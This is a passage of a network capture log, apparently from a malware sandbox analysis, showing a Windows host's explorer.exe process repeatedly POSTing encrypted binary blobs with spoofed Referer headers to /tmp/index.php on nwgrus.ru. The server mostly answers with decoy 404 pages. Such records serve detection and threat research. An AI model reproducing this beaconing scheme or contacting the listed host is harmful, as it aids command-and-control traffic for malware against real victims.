Oct 3, 2024 23:27:40.648235083 CEST	339	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 51 51 ca e4 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vuQQS!Prk'a^F]ZgvS7";/M#iveqtA/$"\-c36@eVoF%8oG& $
Oct 3, 2024 23:27:42.029459953 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49875	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:42.038116932 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dvyvdbiqyxa.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: nwgrus.ru
Oct 3, 2024 23:27:42.038132906 CEST	286	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 43 2a d5 e8 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vuC*2ltdFwA`2L\-i%P\>voU[yVq&!io[=+>~][P)v!NJN\|\|\o:@A7
Oct 3, 2024 23:27:43.406652927 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49886	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:43.415940046 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vjfbbnssutajqo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 356 Host: nwgrus.ru
Oct 3, 2024 23:27:43.415977955 CEST	356	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5b 2c a8 a2 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vu[,Q3OXstZY_wBHEsb\1NEC?MAL5-v%H*BF+1#\G/AgUhhyL/F
Oct 3, 2024 23:27:44.840760946 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49896	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:44.850295067 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://icltdtwcxuda.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 242 Host: nwgrus.ru
Oct 3, 2024 23:27:44.850308895 CEST	242	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 7b 08 d3 85 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vu{5kLv4}({u1YZd]i$"Jr%SR7L`[B+\|M(4UO)$s-@QUK6s(X>:ADCI\
Oct 3, 2024 23:27:46.505533934 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49905	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:46.515476942 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hxmpwtofksapy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 355 Host: nwgrus.ru
Oct 3, 2024 23:27:46.515476942 CEST	355	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 3f 04 a1 eb Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vu?YRNgm3bWwx1n97YKHR<0"8sUN]"ZLBcdHJ).Js@z`CW-ZDu<4
Oct 3, 2024 23:27:47.944294930 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:47 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49915	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:47.954691887 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://prhupsyenaon.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 322 Host: nwgrus.ru
Oct 3, 2024 23:27:47.954725027 CEST	322	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 63 36 b7 be Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vuc6RQXRKJtI9k0^U3qBAN$/)NTE.f2P^(S#tu#%."_q i;Anb I2
Oct 3, 2024 23:27:49.340656996 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49925	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:49.348943949 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pjcbyveqviwch.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 314 Host: nwgrus.ru
Oct 3, 2024 23:27:49.348961115 CEST	314	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 4a 2c a1 a7 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vuJ,}2~tz~7BH,NjSo\+:Q?Vi[XMp\8x,IQ nnv;S<<ka38wGY{-T;
Oct 3, 2024 23:27:50.755795002 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:50 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49933	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:50.764036894 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uppdgnyegjvory.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 146 Host: nwgrus.ru
Oct 3, 2024 23:27:50.764061928 CEST	146	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 79 0e e4 b9 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vuyUer}{$Z<\| wN5tO%,>FT[^VC%
Oct 3, 2024 23:27:52.931044102 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 3, 2024 23:27:52.934246063 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 3, 2024 23:27:52.935062885 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49943	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:52.954955101 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ldpymxrfawi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 263 Host: nwgrus.ru
Oct 3, 2024 23:27:52.954978943 CEST	263	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 59 5e d7 aa Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vuY^-OV\OZ^*ffyqG)RS.87u.>2rj#LU}ZcY?_UOp{~MYECvNX
Oct 3, 2024 23:27:54.627145052 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

